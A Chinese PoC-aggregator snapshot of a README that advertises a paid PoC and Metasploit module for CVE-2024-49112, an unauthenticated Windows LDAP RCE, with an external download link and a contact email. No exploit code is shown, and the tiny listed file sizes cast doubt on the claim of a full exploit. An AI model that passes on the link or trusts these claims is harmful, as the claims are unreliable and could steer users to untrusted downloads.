关联漏洞
描述
CVE-2024-49112 LDAP RCE PoC and Metasploit Module
介绍
# CVE-2024-49112-PoC
CVE-2024-49112 LDAP RCE PoC and Metasploit Module<br>
[Link to Download: ](https://etxarny.com/f/072b4a1d-5dc3-4a69-be74-184f7c8fcc9b)
## Contact Information
You can reach me at: [bollo.b0@proton.me](mailto:bollo.b0@proton.me)
please dont ask me if I can provide this for free, or if I can test your target, or how to add the module to metasploit(google it please).
what I can offer?:
if you need any help with setting up the python version (I can guide).
if you need help with the analyze (I can answer you questions regarding the analyze via email).
# CVE-2024-49112: Integer Overflow Vulnerability in Windows LDAP Service Leading to Unauthenticated RCE
The **Windows Lightweight Directory Access Protocol (LDAP)** service is vulnerable to an **integer overflow**, which can lead to **unauthenticated remote code execution (RCE)**. This vulnerability allows attackers to execute arbitrary code on a vulnerable system. here, we focus on exploiting the LDAP **server-side** vulnerability (unauthenticate and no user interaction).
## Vulnerability Overview
- **CVE Identifier**: **CVE-2024-49112**
- **Vulnerability Type**: **Integer Overflow**
- **Impact**: **Unauthenticated Remote Code Execution**
- **User Interaction**: **None required**
This vulnerability exists in both the **LDAP server** and the **LDAP client**. However, exploiting these components requires different approaches. here, we will focus on exploitation of the **LDAP server**, which can be targeted directly to achieve RCE without any user interaction.
## Exploit
I will include all my findings and technical details regarding the above mentioned component <br>
with the python script showed below in the video PoC and the custom metasploit module which <br>
I wrote for this to make it easier for post exploitations. <br>
# [Link to Download: ](https://etxarny.com/f/072b4a1d-5dc3-4a69-be74-184f7c8fcc9b)
## PoC Video
You can view PoC video here:
.
文件快照
[4.0K] /data/pocs/60a0c90503f8d98c286977181260a4339dc17177
├── [ 348] CVE-2024-49112.rb
├── [1.2M] ldap.gif
├── [ 359] ldapwin.py
└── [1.9K] README.md
0 directories, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。